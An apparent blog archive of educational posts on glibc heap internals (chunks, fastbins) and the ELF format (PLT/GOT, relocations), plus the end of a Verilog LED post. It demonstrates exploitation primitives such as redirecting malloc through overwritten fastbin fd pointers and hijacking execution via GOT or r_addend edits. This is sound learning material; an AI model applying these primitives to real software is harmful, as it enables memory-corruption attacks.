output [7:0]led //array of LEDs on the Mojo Board
);

wire rst = ~rst_n;
reg [50:0] clk_div;
reg [2:0] dff_1; //d-flip flop for led's
reg [2:0] dff_2;

assign led[1:0] = dff_1[1:0]; //low two bits of the first counter
assign led[3:2] = dff_2[1:0]; //low two bits of the second counter
assign led[6:4] = dff_1 + dff_2; //show the total
assign led[7] = clk_div[20];

always @ (posedge clk) begin
clk_div <= clk_div + 1;

if (clk_div[24:0] == 0) begin
dff_1 <= dff_1 + 1;
end
if (clk_div[27:0] == 0) begin
dff_2 <= dff_2 + 1;
end
if (rst) begin
dff_1 <= 0;
dff_2 <= 0;
end
end
endmodule

In this example I also made them add at different speeds; you can of course make them all tick the same way but that would be kind of lame. Anyway that's it for this one, let me know if I got some stuff wrong, I'm going to keep posting about other boards and blinky lights. Stay tuned!

Glibc Heap Exploitation Basics : ptmalloc2 internals (Part 2) - Fast Bins and First Fit Redirection

2018-12-14T00:06:00.001-08:00

This post is part of a series, check out the others in the series here:

Introduction to ptmalloc2 internals (Part 1) - https://blog.k3170makan.com/2018/11/glibc-heap-exploitation-basics.html
(this)

As I mentioned in the previous post the heap management will keep meta-data about the free chunks in case these chunks can be reallocated. To improve my language from the last post as well I should mention that there are different kinds of lists to manage different sizes of free chunks, namely:

Unsorted Bin - This is basically a list that is meant to temporarily hold any chunks that don't fit into the Fast, Large or Small bin categories. To quote some random persons paper about this:

When freeing chunks not in the range of fastbin, they are inserted into unsorted bin at first rather than the small bins or large bins - https://loccs.sjtu.edu.cn/wiki/lib/exe/fetch.php?media=gossip:overview:ptmalloc_camera.pdf

Small bins - again, as with many things this is just another list or group of lists for holding a particular size of free heap chunk. The threshold may vary per architecture and glibc implementation or even build. But the basic idea is that they are larger than Fast Bins but smaller than Large Bins. I will dig into these with a fair amount of detail in future posts.
Large Bins - for chunks bigger than a maximum size; they are pretty elusive to me at the moment so I'm going to leave these out for a later post as well.
Fast Bins - the star of the show, for all free chunks in a range of sizes below a certain maximum (more details to follow shortly!)

Fastbin'd chunks are chosen to be covered here because they work as extensions to the base malloc_chunk format used for plain old unsorted or "normal sized" heap chunks, and they offer a couple of cool tricks to try out as well! So no large chunks in this post just yet (sorry about that) - but I will give them a look once I get enough data ;) Anyway, on to fastbins!

Fast Bin Format

The fastbins are just a "chunk" yard of unloved memory

Fastbins are reserved for small memory objects (small structs and strings). The idea is that if you are not using chunk sizes that will benefit from the usual compute overhead and accounting information; you just use a simple list of small memory regions that fit the size requested. Fastbins are according to some research present in the heap as a collection of different sizes of fast bins (so not just a single list is possible, multiple fastbins could be operating for each size group), to quote:

"Fastbin is a special design optimized for performance and cache locality. It is a single linked list similar to look aside table of Windows, in which free chunks of same size are linked in a LIFO way. Chunk size of different fastbins varies. There are [totally] 10 fastbins in an arena yet the first 7 are used by default, ranging from 16 to 64 bytes on 32-bit systems or 32 to 128 bytes on 64-bit systems" - https://loccs.sjtu.edu.cn/wiki/lib/exe/fetch.php?media=gossip:overview:ptmalloc_camera.pdf

Another caveat is that fastbin chunks are not coalesced when they are free'd; this is again to save spinning the wheels over such small regions. There's much more about fast bins in the documentation in glibc-[version]/malloc/malloc.c, which is fantastic, and I fully suggest giving it a read through - I'd hate to blindly copy it here.

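That's pretty much the opening blurb on fastbins, let's get into what they look like and how they work.
The size threshold for fastbins is defined in malloc/malloc.c. As it stands in glibc-2.23 the upper bound is MAX_FAST_SIZE = (SIZE_SZ*80)/4, which evaluates to 80 bytes when SIZE_SZ is 4 (32-bit) and 160 bytes when SIZE_SZ is 8 (64-bit). The limit that is in effect by default is a little lower, which is where the 64 and 128 byte figures in the quote above come from. So anything at or below that size will pretty much end up getting fast bin'd.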

To provide a good example of the format; here's a chain of fastbins in memory:

I've grabbed an example screenshot here that also compares a non-fastbinned chunk, just a plain old chunk 0xb0 bytes in size (the first one allocated with a mem pointer at 0x602010) - this is to show the difference between formats a little clearer.

On the left you see the "live" fastbin'd chunks (starting at 0x6020b0). Nothing really gives them away as fastbins in this state except for their sizes. On the right you will see the free'd fastbin'd chunks; a key thing to notice here is that each one has a single pointer in the first word of its user data (forming a singly linked list of fastbin chunks) indicating where the next free fastbin'd chunk is.

What you will notice as well is that we definitely have the case here that fastbin'd chunks next to each other in memory are free'd; but none of the size fields overlap or rather none of the chunks are joined together. As mentioned before they will not be coalesced.

Okay so we know what they look like, lets talk about another important mechanism, the fastbin first fit.

Fastbin First Fit

The fastbins have a slightly different reallocation dance: free'd chunks sit in a Last In First Out (LIFO) list until they are issued for reallocation. What this means is, if we were to free them one after the other in series, the first one returned for re-allocation would be the last one free'd in the series.

In the screenshot below; the memory dump on the left shows the state of the heap just before a malloc is called and after all the fastbin chunks have been free'd. On the right is the heap after the second malloc (or reallocation) has been called. So we should essentially see which fastbin chunks get returned and used and in which order (mostly because I wrote some info into the heap chunks using the program - each allocation writes 0xAA, 0xBB into the heap in the order they are allocated in):

You should be able to pretty easily work out which chunks came back first. Also please keep in mind the pointers showing up on the free list; these 0x602yyy looking values in the heap chunks are the malloc_chunk->fd pointers (fastbins are singly linked and only use fd, which sits 0x10 bytes into the chunk on 64-bit).

The next question you will naturally ask is how do we make it return a pointer we want, or how do we influence the free chunks to, let's say, force a certain free chunk to be returned? What happens when we overwrite this information "in flight" and then see which fastbin is returned? Well here's a recipe for testing this out:

Free up some chunks
Re-point the malloc_chunk->fd pointers of the fastbins
Check out which of the available chunks get 0x4242 written into them (again this 0x4242/0x4141 stuff is purely because I'm making the program paint the heap helpfully for me)

Lets see what this looks like:

So just to explain. First I overwrite the fd pointer with the gdb command set {size_t} 0x602100 = 0x0000000000602000 (0x602100 is the chunk at 0x6020f0 plus 0x10, which is where its fd field lives). This essentially tells the heap that after the first fast bin is returned (the first one in the LIFO at 0x6020f0) it should follow the linked list to the "next" free fastbin, which is now at 0x602000.

The next screenshot shows how allocation was redirected; instead of allocating the next chunk just above the bottom most one, it jumps all the way to the top:

One can clearly see, we just redirected the heap reallocation! The linked list powers belong to us now!!

You can also redirect the heap to a fake chunk somewhere else in a writeable-readable portion of memory. To do this the following needs to be done:

Free up all the fastbins
Just before the first re-alloc, re-point the fastbin that's going to be first fitted to your fake fastbin like so for instance: set {size_t} 0x602100 = 0x601050 (this sets the fd pointer of the chunk at 0x6020f0)
Set the size of the fake fast bin chunk to something acceptable; here I'm just recycling the same size as the one being replaced, like this: set {size_t} 0x601058 = 0x0000000000000051

The below screenshot shows that this was achieved. We can see a weird heap chunk hanging out in the 0x6010yy address region while the rest of the chunks are at 0x6020yy range:

This is not a full on security exploit, but it definitely inches us closer to one. And it also introduces an important little trick for getting the heap to do reliably weird things lol.

This is pretty much it for this post, I'll be covering more heap meta-data in the next post. Stay tuned!

Glibc Heap Exploitation Basics : Introduction to ptmalloc2 internals (Part 1)

2018-11-25T00:10:00.001-08:00

In this post and the others in this series, I will unpack some of the internals to glibc's dynamic heap data structures and associated beasts. This post specifically will start you off with no background insight on the heap (perhaps a little on ELF internals and debugging), and detail some experiments you can perform to learn how the heap works.

Introduction

The Heap is essentially a list of memory regions an executing program uses to store data. The data stored in heap regions is requested during runtime. It allows runtime environments like glibc to offer programs dynamic memory for allocating data. So because this offers memory regions as kind of a "service" (this is what it is for - giving out memory regions), it must mean somewhere in this whole mess there needs to be some accounting information about the memory regions. To this end, the heap describes or decorates user data regions with an internal structure called a chunk. Chunks are in turn classified and grouped according to their properties - basically properties like:

whether they are available for use,
how big they are,
and which chunks are around them in the list and other wonderful things.

The big TL;DR for heap management is that its basic movement will essentially be to perform elaborate dances around the functions of searching through chunks either to free or allocate them.

The heap allocator I will focus on here is glibc's ptmalloc as implemented in glibc versions 2.23-2.28. But this is of course not to say that only glibc is important to understand; there exist multiple approaches to heap allocation. Each approach is unique down to how it achieves various operations, like coalescing free chunks, sorting and searching free chunks and grouping them rapidly, as well as (amongst perhaps even more things) security improvements. So there's a number of places that complexity can breed and fester into security problems. But the root of these problems will often be in how users requesting data, and the allocator managing data, respond to meta-data about memory regions.

To close the introduction: the heap can often seem very intense and complex and have very gnarly internals, but most of them are there to aid memoization and other computer science that serves to speed up searching linked lists. Another way you can say this is that they are nothing more than elaborate ways to store some "cheat" meta-data, so that the allocator doesn't need to search the whole heap memory area for stuff every time. But the meta-data is interesting to us because there are instances when we want to influence the way the list is searched and interpreted.

Heap speak

The basic unit of currency for the heap as you would have guessed is a chunk. We probably want to know what these look like in glibc code, so here ya go:

I should give each field its fair explanation (well as fair as I can be to it):

INTERNAL_SIZE_T - is something I should probably explain; this is a size type for the fields that serve "bookkeeping" functions in the heap management - stuff like sizes and bit fields. This size definition is left to be implementation defined. We can imagine that glibc would want to be portable and flexible across different hardware and runtime implementations - so the width of INTERNAL_SIZE_T can (but I don't think often does) vary. Anyway, INTERNAL_SIZE_T is defined to be size_t - which falls back onto however your C runtime originally solved the problem.
mchunk_prev_size - is the very first part of a chunk format. It holds the size of the chunk just before this one, but only while that previous chunk is free; while the previous chunk is in use, its user data is allowed to spill into this field. Whether the previous chunk is in use is not recorded here but in the least significant bit of mchunk_size (the PREV_INUSE flag): if that bit is 0x1, the chunk just before this one is still "alive".
mchunk_size - pretty standard, holds the size of the current chunk in bytes lol. Chunk sizes are always a multiple of 8, so the three low bits are reused as flags (PREV_INUSE, IS_MMAPPED and NON_MAIN_ARENA).
struct malloc_chunk* fd - so this is a field in the chunk struct defining a space for an address to another chunk. This is because it forms a linked list. This linked list being defined here is the "free list", which snaps together all the chunks that are free on the heap. Here we are defining the "forward pointer" in the linked list.
struct malloc_chunk *bk - you guessed it, this is the same type as the previously mentioned field; here we are just talking about the "backward pointer".
struct malloc_chunk *fd_nextsize - so this field is from another layer of free listing tech in the heap. This pointer is added to a free chunk if its above a certain size threshold (we will cover this later on) - so that the heap manager can track huge chunks should they appear. Its kinda like being a high roller in a casino, when you come out they track your movements and wants even more intensely because you affect the profitability of the evening more.

So we'd probably also want to get a look at what this looks like in execution, see what different kinds of chunks look like (free vs allocated) . We want to be able to understand the base language of the heap internals, before taking part in the conversation. So lets run a simple C program through gdb, and unpack the heap to show how it responds internally. The program I'm going to be looking at is the following:

I know it's a bit long winded; you can totally skip over the other mallocs and frees if you don't want to go through each one. I added them here to give my examples and reversing some more interesting data.

In the code above I've added a simple makeshift "wrapper" function (my friend Galen gave me this idea) and injected a break point just before the last return. This is so that I can isolate the effects of the free and malloc calls on the memory regions we are studying.

And now lets see what happens to the heap as it allocates memory. We need to find a pointer to the heap first. This is pretty easy since malloc will save it in rax after returning back to the main function, I show this in the first few gdb commands:

So as I have it set up, the hook-stop will just spit out everything around $rax-0x10, which is the address where the chunk header information is saved. I do this because when we hit this break point malloc will have just returned and set the register to its return value - which will be the address of the memory region allocated. We can see directly how these macros operate on heap meta-data in glibc/malloc/malloc.c:

So as you can see it's a simple addition or subtraction of two address-sized words (2*SIZE_SZ, which is 0x10 bytes on x86-64) to get the mem (raw memory pointer to where user data starts) or the chunk information starting two words before. There are a number of other operations that extract and set other meta-data.

Okay so that's the basic format pretty much covered lets look at how this looks in action.

Growing heap the natural way

After the first break point hits you should see gdb display the first heap chunk allocated, here's an annotated version of that dump showing the heap format:

Now after this hits your screen, try executing the "c" gdb command to skip to the next break point. You will get a couple more examples of allocated chunks until you see the following on your screen:

This is essentially showing that we can't use the value in $rax as before in the hook-stop. As you would guess this is because $rax does not hold the memory pointer anymore; it's now embroiled in a free call so it holds some other value. Anyway, we can dump the chunk using the address passed to the free_string function since it is conveniently displayed here for us. This is what the chunk looks like after it was free'd:

What is shown in the screen dump above in addition to the free chunk is where the first free chunks fd (free list forward) and bk (free list backward) pointers go. We can see here if we follow them using gdb's memory examiner functions they eventually end up at 0x602a00 which is the top chunk's address; the pointer to the top of the currently allocated heap addresses.

Okay so that's what a chunk looks like when its allocated and free'd, can we have a look at how chunks are coalesced into bigger free chunks? Yes that's what the next section is for!

Free Chunk Coalescence

After allocating the chunks, our program will free up each one in the same order they were allocated in. Now what this means is that we can expect two chunks allocated next to each other; to be free'd right after each other as well - and as a result we will have two chunks that get melded into one.

Here's what that looks like:

What we can see on the left of the screen dump are the two chunks (named chunk 1 and chunk 2) at addresses 0x602580 and 0x6024a0. On the right we have the new coalesced chunk at 0x6024a0 of course, but this time we can see that the size field after coalescing is 0x211 (which as indicated is simply 0xe1 + 0x130).

This is pretty much all there is to this coalescing action really. And that's pretty much all I have for this post, I'll continue this series by moving onto fast-bins, large chunk management and potentially some heap redirection tricks. Stay tuned for the next one folks!

References and Reading

Check out the following to see some inspiration for this post and more awesome things to find out about how the heap works.

https://sourceware.org/glibc/wiki/MallocInternals
http://phrack.org/issues/66/10.html
http://www.phrack.org/issues/68/13.html
https://github.com/shellphish/how2heap
https://www.blackhat.com/presentations/bh-usa-07/Ferguson/Whitepaper/bh-usa-07-ferguson-WP.pdf
2007 BlackHat Vegas V82 Ferguson Understanding the Heap 00 - https://www.youtube.com/watch?v=VLnhV1T5Ng4
The Heap: what does malloc() do? - (bin 0x14) - https://www.youtube.com/watch?v=ZHghwsTRyzQ
ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps
https://www.cs.tufts.edu/~nr/cs257/archive/paul-wilson/fragmentation.pdf
https://www.blackhat.com/docs/eu-17/materials/eu-17-Heelan-Heap-Layout-Optimisation-For-Exploitation-wp.pdf
http://g.oswego.edu/dl/html/malloc.html
https://fossies.org/linux/glibc/malloc/malloc.c

Introduction to the ELF Format (Part VII): Dynamic Linking / Loading and the .dynamic section

2018-11-09T01:08:00.002-08:00

This post is part of a series on the ELF format, if you haven't checked out the other parts of the series here they are:

(Part I) : ELF Header https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html
(Part II) : Program Headers https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html
(Part III) : Section Header Table https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html

and many more!

So in this one I'm going to talk a little bit about how dynamic linking works. I'll unpack some useful things to know about how functions are executed when dynamic linking/loading is in effect.

Overview of dynamic linking

As you would imagine, there are some ingredients to the dynamic linking magic, namely the procedure linkage table, the global offset table and the .dynamic section. I'm going to lay out some basic GOT and PLT theory, and then later on in the post I'll back up all this wonderful theory with some disassembled code and gdb screen dumps! So anyway, getting back into it...

The Procedure Linkage Table (PLT) (its actually more like a list of code stubs) is a rough landing area for function calls to hit as a first stop in their dynamic linking journey. The PLT either branches directly to the function definition it needs (by referencing the relevant entry in the Global Offset Table) or sets up a call to the run time to sort it out (along with some other parameters we will see later on!). A better name would be something like a "Procedure linkage function chain" because its actually just a contiguous region of code with a little run time invoking stub at its "head".

The Global Offset Table (GOT) holds values that are meant to point directly to the intended definition - its essentially the "final destination" of a function call. As mentioned above this table is used as kind of a de-coupled reference table for the PLT. This is amazing for exploit deve-uh I mean compiler extension development; because it means if you can achieve simple address wide overwrites you can do a lot by targeting the GOT, in terms of possessing execution flow.

The runtime's end goal is replacing the GOT entry for the called function with its correct value. The PLT entry that triggers when a function is called preps some arguments the runtime needs to resolve the particular GOT entry. These arguments include the link_map for the given object and the index of the function's relocation entry.

So we're going to look at how each of these data-structures work and show simply where you can replace values to subvert execution flow (depending on how you achieve the write of course).

ELF Link Maps

As much as I wish this was literally a map of elf's named link, (breath of the wild reaccs only); link_maps are essentially small data structures that hold a couple pointers to some meta-data needed for completing some dynamic linking action. They are essentially shuffled around the internals of the runtime and dynamic linker; and other shared object handling things. link_map structs are passed directly to the function that invokes the dynamic linking action _dl_runtime_resolve_* (there are some caveats to this depending on os and arch I believe). So they are actually more like little maps that link in the ELF symbol gods. Anyway here's what they look like:
extract from elf/link.h:

The fields are pretty much documented well, as far as I can see they really do behave as described.
We can though confirm some of these details through some light data collection and debugging. Here's a demonstration of how the l_next and l_prev field's work:

So essentially each link_map ends its record with these values; they contain the addresses for finding the next and the previous element in the list. I don't see anything just yet, but I'm looking out for things that make use of the l_next and l_prev elements in a turing completey way ;)

There is one other field I would like to expand on here, namely l_ld; this is the reference to the .dynamic section of the object this link_map describes. And as you guessed, it means we will probably need to talk about how the .dynamic section works.

The .dynamic section

The dynamic section essentially holds a number of arguments that inform on and influence parts of the dynamic linker's behavior. This is because as a component of the runtime, the dynamic linker does many other things besides just relocate functions it also executes other house keeping functions like INIT and FINI. Here's what the entries of the dynamic section look like according to glibc:
extract from elf/elf.h:

This is simply a list of pairs of address-sized values, one indicating the type of dynamic section entry (d_tag) and one for the actual value of the entry (d_un). We have a union type here because the value can be either a plain number or an address, depending on the tag. Take a look at this hexdump example to see how the values can vary for the d_un field:

Okay so that's the link_map and .dynamic section done we can move onto looking at what happens when a function is resolved and how this affects the GOT.

Runtime lazy loading up close

To get functions resolved without preparing all the relocations up front, the ELF format and dynamic linker use a mechanism called lazy loading (also known as lazy binding). Lazy loading essentially means resolving and patching up the GOT entry for a function the first time it is called. This is so that subsequent calls to that function do not need to involve the dynamic linker / runtime (in a previous post I showed explicitly how the dynamic linker kicks in again if you mess with some other meta-data).

Okay so lets see if all this cool theory is true in practice. How are we going to see what the runtime does with the GOT? Well to lay out a simple methodology:

Find a pointer to the top of the PLT (I will also cover some structuring of the PLT to show you where the "top" is)
Once we have the PLT we can then find two things 1) the GOT entry for the function being called and 2) a break point to set before the GOT is edited (namely the entry point of the runtime)
Set a break point to a function
Compare the GOT values before and after.

First step is to find a pointer to the top of the PLT. Let's take a look at an annotated dump of a binary's _start and PLT sections (I disassembled _start because in order to call __libc_start_main it needs to involve the PLT as well):

So we can see from the picture that at instruction 0x400534 a call to the PLT entry of __libc_start_main is made. This then ends up doing a couple things:

0x4004e0 jumping through 0x601030, the GOT entry for __libc_start_main. This is how lazy loading works: if the GOT entry has already been patched, this first instruction lands directly in the function, but on the first call the GOT entry still holds the address of the instruction right after the jump - so it's effectively a jump to the next position in the PLT.
0x4004e6 pushing a number onto the stack - this is the index of the relocation entry that applies to this action, the dynamic linker needs this to do its job.
0x4004eb jumping to the head of the PLT which invokes the dynamic linker directly.

Okay lets see what the PLT looks like in its full glory:

And so we can see a format for the PLT forming, namely every entry has these base elements:

jump to the GOT
push reloc index
jump to PLT head (_dl_runtime_resolve*)

The head contains some interesting code. We can see at instruction 0x4004a0 some value gets pushed onto the stack before it jumps off to _dl_runtime_resolve at instruction 0x4004a6. What's happening here is that a link_map is being passed to _dl_runtime_resolve as an argument: it is the link_map for the object that owns this PLT (the module making the call, not the library that ends up providing the symbol), so the runtime knows which object the relocation index pushed by the PLT entry belongs to.

We can dissect this argument across different calls to _dl_runtime_resolve to see that it is in fact always a link_map object. We know that a link_map must contain a pointer into the dynamic section, so if we see values that look like dynamic section addresses in the area around the pointer being passed to _dl_runtime_resolve, it is most likely a link_map object. Or I should rather say: whatever appears there, _dl_runtime_resolve will treat it like a link_map object.

So lets see what these values look like as they are flying into the resolve call:

I can also show that the GOT in fact does get patched with new values as the runtime gets called. Here's a screenshot showing this for the puts resolution:

After the second break point at 0x4004a0 hits (which is the setup code for the call to dl_runtime_resolve) we can clearly see some new entry in the GOT at address 0x601020; the update adds the address 0x7ffff7a7c690 which we can see from symbol information in the debugger is the _IO_puts function! GOT entry correctly updated.

Okay that's pretty much it for this post. In later posts I may talk a little about how to abuse this lazy loading mechanism to achieve execution of other functions - some cool tricks. For now I thought I'd keep it short and only explain some main concepts here and leave the advanced sorcery and ELF black magic for future posts. Stay tuned folks!

References and Reading

Some stuff I read and relied on to make this post. Very useful information here!

Introduction to the ELF Format (Part VI) : More Relocation tricks - r_addend execution (Part 3)

2018-10-22T18:34:00.000-07:00

So I lied a little about what would be the next in the series, I realized there was something I should have added to the previous one - which ironically was the addends about the r_addend field :) So here it is, the section on mangling r_addend fields with some other tricks I left out.

Some things you might need are:

Executable code we will dissect; this is the definition for never_call.c https://gist.github.com/k3170makan/c7712b7aa14f1c2e7c0e7ae725f2fac1
binutils
GCC

An average linux distro will have these things already ready to roll besides maybe hexedit/hexdump.

Mangling dynamic symbol relocation r_addends

r_addend you glad it didn't say 0xAAAA...?

In the previous post, I mentioned the basics of the relocation entry format and showed how complex they can become and how one ELF object can have a bunch of different .rela.[name] sections. These sections have their relocs applied at different stages of the ELF's life cycle: some when calling functions, others to help the runtime perform initialization. For the first example we are going to focus on the .rela.dyn section and what happens when we are too liberal with the values in the r_addend.

The r_addend, if you weren't aware, is a field in relocation entries that specifies an additional constant to be used in the relocation calculation. I also mentioned that this field is not actually used much on the x86_64 platform and for the most part (as far as I can see) is nulled out. So you will have .rela.* sections ('a' meaning with r_addend) in your binary, but their r_addend fields will be set to 0 most of the time.

Poking and prodding these r_addend fields as they appear in some binaries, I found that you can actually get the runtime to execute from the r_addend value if you make it non-zero. Here's the proof of concept:

In this screenshot I am changing the r_addend of the relocation for __gmon_start__(2), which appears at address 0x3B0. It's not so important where it gets called; I am pretty sure it's just after _start and before the main method.

What's good to know is that, going by the source, the never_call function should never be called: there is no simple logical progression leading to never_call's execution, because the code for this binary is only written to print two strings and then exit.

Now, you should check the readelf output as well (in the screenshot); it confirms that we are changing this field correctly. Also notice that we have only edited the .rela.dyn's r_addend value for this field; meaning the actual symbol value for __gmon_start__ is untouched in both the dynamic symbol table (.dynsym) and full symbol table (.symtab).

This pretty much does straight up execute the r_addend value, I've confirmed this in many other ways (for instance we can see that the segfault happens at this instruction point value consistently):

It is of course implied that I am forcing it to take the completely unnatural instruction pointer values of 0xaa.. 0xbb... etc.

This behavior is isolated to a couple of relocation types (r_types). I furthered my investigation into which r_types allow for this in some capacity, and I got execution by using the following relocation types:

R_X86_64_64 0x01 - Direct 64 bit Reloc
R_X86_64_IRELATIVE 0x25 - Adjust indirectly by program base
R_X86_64_RELATIVE 0x08 - Adjust by program base
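For reference, the x86-64 psABI defines the calculation for these three types as S + A (R_X86_64_64), B + A (R_X86_64_RELATIVE) and "indirect (B + A)" (R_X86_64_IRELATIVE), where S is the symbol value, B the load base and A the r_addend. The sketch below only models that arithmetic; the names (demo_reloc_value, demo_reloc_result) are made up for illustration and nothing here is glibc's actual code.

```c
#include <stdint.h>

/* Relocation type numbers as listed in the post. */
enum {
    DEMO_R_X86_64_64        = 0x01,
    DEMO_R_X86_64_RELATIVE  = 0x08,
    DEMO_R_X86_64_IRELATIVE = 0x25
};

struct demo_reloc_result {
    uint64_t value;      /* S + A or B + A, depending on the type */
    int      is_called;  /* 1 when the loader calls `value` as a function */
    int      supported;  /* 0 for types this sketch does not model */
};

/* Model of the psABI calculation for the three types above.
 * base = B (load base), sym_value = S, addend = A (r_addend). */
static inline struct demo_reloc_result
demo_reloc_value(uint32_t type, uint64_t base, uint64_t sym_value, int64_t addend)
{
    struct demo_reloc_result r = { 0, 0, 1 };

    switch (type) {
    case DEMO_R_X86_64_64:
        r.value = sym_value + (uint64_t)addend;   /* S + A */
        break;
    case DEMO_R_X86_64_RELATIVE:
        r.value = base + (uint64_t)addend;        /* B + A */
        break;
    case DEMO_R_X86_64_IRELATIVE:
        r.value = base + (uint64_t)addend;        /* B + A is a resolver address */
        r.is_called = 1;                          /* its return value is what gets stored */
        break;
    default:
        r.supported = 0;
        break;
    }
    return r;
}
```

In all three cases the addend flows straight into the value written at r_offset, and for IRELATIVE the computed address is called by definition. That does not settle exactly how execution is reached in the experiment above, but it shows where a non-zero r_addend enters the picture.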

I'll get into deep detail about exactly why these end up getting executed, but it's going to take a little more research before I can confidently talk about that lol.

We know of course the rela sections will appear in the live memory image (this is because they form part of a PT_LOAD segment(1)), so we know that they will potentially be "referenceable" from inside running code. This means they offer data to target that could potentially affect execution flow.

Footnotes

(1) Not directly because the section they appear in is marked ALLOC, as some would refer to it.
(2) Which is, to cut a long story short, afaik a profiling function that gets called during the runtime initialization from _init().

References and Reading

This post is part of a series on the ELF format, if you haven't checked out the other parts of the series here they are:

(Part I) : ELF Header https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html
(Part II) : Program Headers https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html
(Part III) : Section Header Table https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html
(Part IV) : Section Types and Special Sections https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html
(Part V) : C Start up https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-v.html
(Part VI)

The Symbol Table and Relocations Part 1 https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-vi.html
Symbols and Relocs Part 2 https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-vi_18.html
(Part VI) : this

So if these sound like another language to you, try starting a little further up in the chain ;)

Introduction to The ELF Format (Part VI): The Symbol Table and Relocations (Part 2)

2018-10-18T20:40:00.000-07:00

This post is part of a series on the ELF format, if you haven't checked out the other parts of the series here they are:

(Part I) : ELF Header https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html
(Part II) : Program Headers https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html
(Part III) : Section Header Table https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html
(Part IV) : Section Types and Special Sections https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html
(Part V) : C Start up https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-v.html
(Part VI) : The Symbol Table and Relocations Part 1 https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-vi.html
this

In this post I'm going to explain a little bit more about how Relocations and Symbols work. We talked about the symbol table specifically in the previous post, but weren't fair about why Relocations are needed and how they are used.

Introduction

"The real is what resists symbolization absolutely" - Jacques Lacan (1)

When compiling and linking a program, the attributes used in each component object are placed at a given offset away from their original position in the final object. The ELF format records this offset and a mechanism for its resolution in relocation records. Relocation records hold information used by various utilities to help aim at the right part of the ELF file containing the definition of a symbol. They also allow compilers and C developers to extend the functionality of symbol resolution with extra hooks and plugins and what have you, so like exploit dev except you actually want to write to a function pointer with data lol. So symbol information, but for symbols themselves!

Relocations can take on a number of types, subsets of which are colloquialized and implemented across architectures - so many archs will have their own symbol resolution mechanisms applied to the relocation record format discussed here. Besides this already sparse field of definitions, relocation records (referred to as "relocs" from here on out...sometimes) are used for various reasons throughout a program's life cycle. Some relocs are used to prep the runtime, others for plain old dynamic linking and lazy loading, and there may very likely be more functions that are as yet undefined or unmentioned.

Let's take a look at how this Relocation format works and which sections are meant to hold information for it.

The Relocation Table (.rel, .rela.dyn and friends)

To give an overview of how complex these fields are here's a small cheat sheet:

So as we know the section header table will be able to point us at different parts of an ELF file and elaborate what they are meant for. Some section headers mentioned here are specifically for holding relocation information; and because relocation as we said can have multiple purposes, there are multiple relocation sections. The naming scheme should be pretty much the same in that it mentions more or less what its relocation entries are for in the .rela.[name] scheme:

.rel.dyn .rela.dyn - relocation entries for dynamic symbols
.rel.plt .rela.plt - relocation entries for PLT meta-data (usually prepping JMP gadgets)
other types exist but I find they are rarely used or hard to find examples for.

rela, with an "a" at the end, indicates that relocations with addend fields are used in the section. Relocation with addend is the one commonly used on x86_64 it seems, although the actual r_addend field is almost always 0 - glibc also maintains some flags to configure whether this field is used as part of the relocation.

Basically that means, you will see relocation with addends used in "format"; but the actual addend will most likely always be set to 0. Which is more effectively just a normal reloc but with a NULL word at the end of each one. Potentially useful depending on how code trusts that NULL at the end when it loops through records.

Anyway, seeing that there could be a number of different .rela.[name] sections for just about any crazy purpose, I decided to go looking for some weird [name] values. So I scanned my own machine quite liberally for ELF objects and found that few of them use any wilder form of .rel section - compared to the common rel(a).dyn, rel(a).plt:

The .fffff sections are from me doing research for this blog series but I freaked out a little when I saw them at first lol

Moving on, we should probably look at the struct the C runtime and glibc use to handle Relocation records:

(extract from glibc-2.28/elf/elf.h)

This is what I've gathered each of the fields in the struct are meant for:

Elf64_Addr r_offset (8 bytes wide) - the location the relocation is applied to. In executables and shared objects this is the virtual address of the slot being patched (a GOT entry, for example); in relocatable files it is an offset into the section being relocated. I expand on these a little later on in this post, but to be fair to them please check out the documentation on this.
Elf64_Xword r_info (8 bytes wide) - a bit field the runtime will pull through some macros to determine the kind of relocation being defined. The field holds typing information for the reloc entry as well as the symbol index it is meant to refer to. Quite a crucial field, because if you can write to it you can make relocs point to different symbols, which is pretty powerful depending on context.
Elf64_Sxword r_addend (8 bytes wide) - the addend, a parameter included in the calculation of the relocation - pretty much always ignored in the x86_64 format I'm using. I will explore how true this claim is later on.

To expand on how the r_info field is used for determining type information for the reloc, here's an annotated screenshot:

Nothing too fancy, the r_info field (as with many C-esque ELF Metadata *_info field things) is just a bit field that gets pulled through some shifting / anding operations to isolate the bits that are contingent on certain properties of the field.
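The shifting and anding can be sketched in a few lines of C. The DEMO_R_* macros below are local copies that follow the same arithmetic as glibc's ELF64_R_SYM, ELF64_R_TYPE and ELF64_R_INFO (symbol index in the upper 32 bits, relocation type in the lower 32); demo_retarget_symbol is a hypothetical helper added purely for illustration.

```c
#include <stdint.h>

/* Local copies of the r_info arithmetic: upper 32 bits hold the symbol
 * table index, lower 32 bits hold the relocation type. */
#define DEMO_R_SYM(info)       ((uint32_t)((uint64_t)(info) >> 32))
#define DEMO_R_TYPE(info)      ((uint32_t)((uint64_t)(info) & 0xffffffffu))
#define DEMO_R_INFO(sym, type) ((((uint64_t)(sym)) << 32) + (uint64_t)(type))

/* Hypothetical helper: keep the relocation type but point the entry at a
 * different symbol table index. */
static inline uint64_t demo_retarget_symbol(uint64_t r_info, uint32_t new_sym)
{
    return DEMO_R_INFO(new_sym, DEMO_R_TYPE(r_info));
}
```

For instance, an r_info of 0x0000000200000007 splits into symbol index 2 and type 7 (R_X86_64_JUMP_SLOT), and demo_retarget_symbol(0x0000000200000007, 1) gives 0x0000000100000007.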

